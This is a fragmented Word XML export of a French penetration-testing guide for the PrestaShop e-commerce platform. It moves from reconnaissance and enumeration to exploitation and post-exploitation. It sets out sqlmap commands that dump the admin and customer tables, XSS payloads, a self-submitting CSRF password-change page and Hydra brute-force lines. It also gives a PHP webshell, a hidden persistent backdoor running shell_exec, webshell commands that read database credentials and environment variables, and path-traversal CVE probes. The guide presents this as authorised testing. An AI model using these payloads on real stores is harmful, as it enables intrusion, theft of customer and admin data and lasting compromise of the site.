      <w:r w:rsidRPr="00DE786A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FOUND: $module${NC}"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6.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Security headers check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"${YELLOW}[+] Checking security headers...${NC}"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HEADERS=$(curl -s -I $TARGET)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SECURITY_HEADERS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=(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"X-Frame-Options"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"X-Content-Type-Options"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"Strict-Transport-Security"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"Content-Security-Policy"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"X-XSS-Protection"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header in "${SECURITY_HEADERS[@]}"; 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echo "$HEADERS" |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-qi "$header"; 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${GREEN}[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A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$header: Present${NC}"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  ${RED}[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A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 $header: Missing${NC}"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"${GREEN}[*] Scan completed!${NC}"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lastRenderedPageBreak/>
        <w:t>chmod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+x ~/tools/prestashop-scanner.sh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Exécuter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le scanner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~/tools/prestashop-scanner.sh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vulnerabilities/prestashop-custom-scan.txt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Test Checkout Process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manipulation de prix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vulnerabilities/price-manipulation.sh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TARGET=$1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echo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"[*]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Testing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Price Manipulation..."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 1. Ajouter produit au panier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https://$TARGET/cart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id_product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=123&amp;qty=1"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-c cookies.txt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2&gt;&amp;1 | tee price-test-1.txt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Obtenir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ID du cart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CART_ID=$(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id_cart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=\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K[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0-9]+' cookies.txt)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Cart ID: $CART_ID"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 3. Tenter modification prix (via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Burp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Intercept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"[!] Use Burp Suite to intercept and modify:"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  - Product price"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  - Negative quantity"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  - Different product ID"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4.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Valider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commande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https://$TARGET/order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-b cookies.txt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payment_method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free&amp;confirm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=1"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2&gt;&amp;1 | tee price-test-2.txt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chmod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+x vulnerabilities/price-manipulation.sh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File Upload Testing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lastRenderedPageBreak/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</w:t>
      </w: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upload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de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fichiers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malveillants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1.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Shell PHP simple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exploits/shell-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simple.php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system($_GET['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']); ?&gt;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Shell avec bypass extension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exploits/shell.php.jpg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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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isset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($_REQUEST['c'])){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$_REQUEST['c']);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3.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Shell avec GIF header bypass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exploits/shell-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gif.php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GIF89a;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$_GET['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cmd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']);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4.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Test upload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avatar/image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/account/upload-avatar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"avatar=@exploits/shell-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simple.php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-b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"session=xyz123"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vulnerabilities/upload-test-1.txt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5.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avec MIME type bypass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/upload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"file=@exploits/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shell-simple.php;type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=image/jpeg"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multipart/form-data"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vulnerabilities/upload-test-2.txt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6.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null byte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/upload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"file=@exploits/shell.php%00.jpg"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vulnerabilities/upload-test-3.txt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7.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double extension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mv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exploits/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shell-simple.php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exploits/image.php.jpg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/upload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"file=@exploits/image.php.jpg"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vulnerabilities/upload-test-4.txt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API Testing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Tester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l'API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PrestaShop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1.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Endpoints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communs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vulnerabilities/api-endpoints.txt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/customers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/products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/orders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/carts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/addresses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/categories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/manufacturers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webservice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webservice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dispatcher.php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accès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non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authentifié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"[*] Testing unauthenticated API access..."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endpoint;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"Testing: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$endpoint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STATUS=$(curl -s -o /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dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/null -w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</w:t>
      </w:r>
      <w:proofErr w:type="gram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{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http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_code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}"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https://$TARGET$endpoint)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  Status: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if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200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$STATUS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eq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401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then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$TARGET$endpoint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2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&amp;1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fi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vulnerabilities/api-endpoints.txt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vulnerabilities/api-test-results.txt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3. Test avec clé API (si trouvée)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Chercher clé API dans fichiers config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API_KEY=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"REPLACE_WITH_FOUND_KEY"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avec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authentification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basic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GET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/customers"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"Authorization: Basic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$(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-n $API_KEY: | base64)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vulnerabilities/api-authenticated.txt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4.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Fuzzing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paramètres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API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wfuzz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-c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-z file,~/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/Discovery/Web-Content/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api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/api-endpoints.txt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"https://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$TARGET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/api/FUZZ"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404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vulnerabilities/api-fuzzing.txt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5.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IDOR (Insecure Direct Object Reference)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"[*] Testing IDOR on API..."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{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..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}; </w:t>
      </w:r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/api/customers/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$i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-H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"Authorization: Basic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$(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-n $API_KEY: | base64)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-E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email|firstname|lastname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vulnerabilities/api-idor-test.txt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DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Payment Gateway Testing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Test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vulnérabilités</w:t>
      </w:r>
      <w:proofErr w:type="spell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payment gateway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1.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PayPal IPN bypass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vulnerabilities/paypal-ipn-test.sh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TARGET=$1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Simuler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IPN PayPal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https://$TARGET/modules/paypal/ipn.php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payment_status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=Completed"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txn_id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=FAKE123456"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mc_gross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=0.01"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receiver_email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=merchant@example.com"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"custom=order_id_123"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&gt; paypal-ipn-test.txt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lastRenderedPageBreak/>
        <w:t>chmod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+x vulnerabilities/paypal-ipn-test.sh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2.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Stripe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webhook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vulnerabilities/stripe-webhook-test.sh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TARGET=$1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Simuler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webhook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Stripe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https://$TARGET/modules/stripe/webhook.php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"Content-Type: application/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json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'{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type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payment_intent.succeeded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",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data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object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{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"pi_fake123",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amount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100,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currency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"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",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status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": "succeeded"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}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}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}'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-v &gt; stripe-webhook-test.txt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chmod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+x vulnerabilities/stripe-webhook-test.sh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pict>
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>8. REPORTING ET DOCUMENTATION {#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>reporting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>}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Screenshots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Automatisés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DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>bash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Installer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CutyCapt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sudo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apt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install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cutycapt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xvfb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Script de capture automatique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screenshots/auto-capture.sh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TARGET=$1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URLS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=(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"$TARGET"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"$TARGET/admin"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"$TARGET/cart"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"$TARGET/login"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"$TARGET/modules"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"$TARGET/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in "${URLS[@]}"; do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filename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=$(echo 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's/https:\/\///g' |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's/\//-/g')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xvfb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-run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--server-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args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="-screen 0, 1920x1080x24"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cutycapt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--out=screenshots/${filename}.png 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--delay=2000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Captured: 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chmod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+x screenshots/auto-capture.sh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./screenshots/auto-capture.sh https://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$TARGET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DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Template de Rapport Professionnel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reports/pentest-report.md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&lt;&lt;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RAPPORT DE TEST D'INTRUSION PRESTASHOP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## INFORMATIONS GÉNÉRALES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Élément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Détail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---------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--------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**Cible**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https://shop.example.com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**Adresse IP**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192.168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.1.100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**Date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du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test**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[DATE]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**Testeur**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[NOM]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**Portée**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Full Carte Blanche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**Méthodologie**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OWASP WSTG, PTES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## RÉSUMÉ EXÉCUTIF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### Posture de sécurité globale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**Score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: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[X/10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]*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[Description générale de l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'état de sécurité]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### Statistiques des vulnérabilités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| Sévérité | Nombre | Priorité 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|----------|--------|----------|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|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🔴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Critique | X | Immédiate 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|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🟠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Haute | X | Urgente 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|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🟡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Moyenne | X | Importante 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|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🔵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Faible | X | Normale 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| ℹ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️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Info | X | - |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 MÉTHODOLOGIE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1. **Reconnaissance**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OSINT (Google Dorks,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Shodan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 etc.)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Énumération DNS et sous-domaines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Scan de ports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Identification technologies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WhatWeb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,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Wappalyzer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**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Énumération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Directory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bruteforcing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,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Fingerprinting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Énumération modules et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admin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panel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3. **Analyse vulnérabilités**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Scan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automatisé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(Nuclei,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Nikto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Tests SQL Injection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Tests XSS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,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manuel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Tests CSRF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API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testing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4. **Exploitation**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Exploitation SQL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Exploitation modules vulnérables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File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upload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exploitation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Brute force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5. **Post-exploitation**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  - Collecte d'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informations sensibles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Privilege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escalation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Persistence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## FINDINGS DÉTAILLÉS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 xml:space="preserve">### [CRITICAL] SQL Injection dans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786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search.php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**Sévérité**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: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🔴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Critique (CVSS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9.8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**CWE*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*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CWE-89 (SQL Injection)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**URL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affectée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*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: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`https://shop.example.com/search.php?search_query=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INJECTION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]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**Description**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Une vulnérabilité de SQL Injection non authentifiée a été identifiée dans le paramètre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`</w:t>
      </w:r>
      <w:proofErr w:type="spell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search_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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`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.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Un attaquant peut exécuter des requêtes SQL arbitraires permettant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Extraction complète de la base de données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Bypass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d'authentification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Potentiel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Remote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Code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Execution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via SQL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shells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**Preuve de concept**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sqlmap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-u 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"https://shop.example.com/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search.php?search_query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=test"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--batch --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dbs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`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**Résultat** </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE786A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DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>prestashop_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> [*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>mysql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**Données extraites**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- 15,000+ comptes clients avec emails et mots de passe hachés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- 50+ comptes administrateurs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Informations de paiement (partielles)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**Impact**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Perte totale de confidentialité des données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Accès non autorisé à l'administration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Potentiel compromission complète du serveur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**Recommandation**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1. Utiliser des requêtes préparées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Prepared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Statements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2. Implémenter validation stricte des entrées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3. Appliquer principe du moindre privilège sur utilisateur DB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4. Mettre à jour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vers dernière version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5. Implémenter WAF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ModSecurity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**Code correctif**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php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// AVANT (Vulnérable)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$query = "SELECT * FROM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ps_product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WHERE name LIKE '%"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.$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_GET['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search_query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']."%'";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APRÈS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Sécurisé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stmt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= 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pdo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-&gt;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prepare(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"SELECT * FROM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ps_product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WHERE name LIKE :search");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stmt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-&gt;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execute(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['search' =&gt; '%'.$_GET['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search_query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'].'%']);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**Screenshots*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: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[Capture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extraction DB]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[Capture admin dump]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[HIGH] Cross-Site Scripting (XSS) Reflected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**Sévérité** :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🟠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Haute (CVSS 7.2)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**CWE** : CWE-79 (Cross-site Scripting)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**URL affectée** : `https://shop.example.com/search.php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?search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_query=[XSS]`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**Description**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XSS reflété permettant injection de JavaScript arbitraire.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PoC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```html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https://shop.example.com/search.php?search_query=&lt;script&gt;alert(document.cookie)&lt;/script&gt;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**Impact**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Vol de sessions utilisateurs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Phishing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ciblé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Redirection malveillante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**Recommandation**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Encoder toutes les sorties HTML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htmlspecialchars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Implémenter Content Security Policy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Validation stricte des entrées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### [MEDIUM]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Admin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Panel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Enumerable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**Sévérité** :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🟡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Moyenne (CVSS 5.3)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**Description**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Le panel d'administration est accessible via chemin prévisible `/admin123` sans protection contre le brute force.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PoC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:</w:t>
      </w:r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```bash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Panel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trouvé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https://shop.example.com/admin123/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**Recommandation**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1. Renommer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admin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folder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avec nom aléatoire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2.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Implémenter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IP whitelisting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Rate limiting strict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4. Authentification multi-facteurs (MFA)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### [LOW] Information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Disclosure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**Sévérité** :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🔵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Faible (CVSS 3.7)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**Description**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Fichiers sensibles exposés permettant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fingerprinting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et collecte d'informations.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**Fichiers exposés**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`/docs/CHANGELOG.txt` (version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`/config/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config.inc.php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 (erreur 403 mais confirme existence)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`/robots.txt` (chemins sensibles)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**Recommandation** :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Supprimer/bloquer fichiers sensibles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Configuration `.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htaccess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 restrictive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 RECOMMANDATIONS PRIORITAIRES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###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🔴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Urgentes (0-7 jours)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1. **Corriger SQL Injection**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Patcher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search.php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immédiatement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Audit complet du code pour autres injections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2. **Corriger XSS**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Encoder toutes les sorties utilisateur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Implémenter CSP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3. **Sécuriser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admin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panel**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Renommer dossier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admin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Activer MFA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IP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whitelisting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###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🟠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Importantes (7-30 jours)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4. **Mise à jour système**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Upgrade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vers dernière version stable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Mettre à jour tous les modules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5. **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Durcissement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serveur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Implémenter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WAF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ModSecurity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Rate limiting global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 Headers de sécurité (HSTS, X-Frame-Options, etc.)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6. **Audit complet du code**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Review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tous les modules tiers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- Tests de sécurité automatisés (CI/CD)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### </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>🟡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Recommandées (30-90 jours)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7. **Monitoring et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alerting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</w:t>
      </w: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SIEM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Splunk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 ELK)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IDS/IPS (Snort, Suricata)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8. **Formation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équipe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Secure coding practices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OWASP Top 10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9. **Pen-test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réguliers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Tests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trimestriels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Bug bounty program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 TESTS EFFECTUÉS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### Scan de ports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full port scan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Service detection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Vulnerability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scan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NSE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###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Énumération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Directory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bruteforce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Dirb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,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fingerprinting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Module enumeration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- Admin panel discovery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### Tests de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vulnérabilités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SQL Injection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XSS (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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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manuel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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CSRF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File upload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API testing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Authentication bypass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Payment gateway testing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Exploitation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SQL Injection exploitation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Database dump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WebShell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gram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upload</w:t>
      </w:r>
      <w:proofErr w:type="gram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attempts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Privilege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escalation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 ANNEXES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### A. Outils utilisés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7.94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SQLMap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1.8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Burp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Suite Professional 2024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Metasploit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Framework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Nuclei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Gobuster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XSStrike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B. Wordlists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SecLists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Rockyou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Custom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wordlists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### C. CVE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référencés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CVE-2022-36408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CVE-2023-30838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CVE-2023-30535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### D.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Références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OWASP Testing Guide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PTES Methodology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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Security Advisories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**Rapport généré le** : [DATE]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**Classification** : CONFIDENTIEL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**Version** : 1.0  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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE786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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Checklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Complète</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE786A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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proofErr w:type="gramStart"/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cat</w:t>
      </w:r>
      <w:proofErr w:type="gram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reports/pentest-checklist.md </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A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&lt;&lt;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'EOF'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# CHECKLIST DE TEST D'INTRUSION PRESTASHOP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## </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>☐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RECONNAISSANCE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### OSINT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Whois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lookup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DNS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enumeration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Subdomain discovery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Google Dorks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Shodan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Censys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search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GitHub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GitLab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code leaks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Wayback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Machine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Email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harvesting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 [ ] Social media reconnaissance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### Scan réseau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Nmap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port scan (TCP)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Nmap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port scan (UDP)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Service version detection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OS fingerprinting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Vulnerability scan NSE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lastRenderedPageBreak/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## </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>☐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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>É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NUM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>É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RATION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Web application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Technology detection (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WhatWeb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,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Wappalyzer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HTTP headers analysis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robots.txt / sitemap.xml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Directory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bruteforce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(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Dirb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File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bruteforce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(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Gobuster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Sensitive file discovery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###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PrestaShop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spécifique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Version detection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Module enumeration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Theme detection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Admin panel discovery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API endpoint discovery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Database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prefix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identification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## </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>☐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VULN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>É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RABILIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>É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###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Automated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scans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Nuclei scan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Nikto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scan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WPScan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adaptation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OWASP ZAP active scan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SQL Injection (search)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 [ ] SQL Injection (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product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pages)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 [ ] SQL Injection (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cart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/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checkout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SQL Injection (API)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Command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LDAP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XML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XSS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lastRenderedPageBreak/>
        <w:t>- [ ] Reflected XSS (search)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Stored XSS (comments)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DOM-based XSS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XSS in error messages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Authentication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Brute force admin login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Password policy check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Session management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Remember me functionality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Password reset mechanism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Account lockout testing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Authorization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IDOR (customers)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IDOR (orders)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IDOR (invoices)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Privilege escalation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Forced browsing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### Business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logic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 [ ] Price manipulation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 [ ] Discount code abuse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Negative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quantity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- [ ] Race conditions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Payment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bypass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File upload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Unrestricted file upload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Extension bypass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MIME type bypass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Null byte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Path traversal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API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Unauthenticated access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Excessive data exposure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Rate limiting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IDOR in API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Injection in API parameters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### Other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CSRF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Clickjacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Open redirect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SSRF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XXE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Insecure deserialization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## </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>☐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EXPLOITATION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Exploit SQL Injection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Exploit file upload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Exploit module vulnerabilities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WebShell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deployment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Database extraction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Admin account creation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## </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>☐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POST-EXPLOITATION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Privilege escalation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Lateral movement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Data exfiltration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Persistence mechanism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Cover tracks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## </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE786A">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w: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REPORTING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Screenshots collected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- [ ] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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documented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Impact assessed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Remediation provided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Executive summary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[ ] Technical details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lastRenderedPageBreak/>
        <w:t>- [ ] Risk ratings (CVSS)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---</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE786A" w:rsidRPr="00DE786A" w:rsidRDefault="00DE786A" w:rsidP="00DE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DE786A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DE786A" w:rsidRDefault="00DE786A"/>
    <w:sectPr w:rsidR="00DE78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F7E44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F82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4A32B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D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8443F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A16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916"/>
    <w:rsid w:val="005A3B80"/>
    <w:rsid w:val="00754BC8"/>
    <w:rsid w:val="00B45916"/>
    <w:rsid w:val="00DE786A"/>
    <w:rsid w:val="00E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E786A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E786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E786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86A"/>
    <w:rPr>
      <w:rFonts w:eastAsia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E786A"/>
    <w:rPr>
      <w:rFonts w:eastAsia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E786A"/>
    <w:rPr>
      <w:rFonts w:eastAsia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DE786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E7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E786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E786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DE786A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DE786A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Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00DE786A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DE786A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E786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E786A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E786A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E786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E786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86A"/>
    <w:rPr>
      <w:rFonts w:eastAsia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E786A"/>
    <w:rPr>
      <w:rFonts w:eastAsia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E786A"/>
    <w:rPr>
      <w:rFonts w:eastAsia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DE786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E7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E786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E786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DE786A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DE786A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Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00DE786A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DE786A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E786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E786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30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9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1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9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5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71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0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8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9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7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7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3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8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4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24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6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0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05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0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7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1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6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2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7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0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8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48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2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40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4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5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54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3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8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54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1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8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0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7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6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3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2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6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66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6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3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4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6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7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4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3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0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1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21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2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8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5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7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6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1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0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7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5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2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0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1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13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8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3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0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8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3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3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0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86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6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8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9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9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9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2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4745</Words>
  <Characters>26101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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-16T06:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-16T07:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>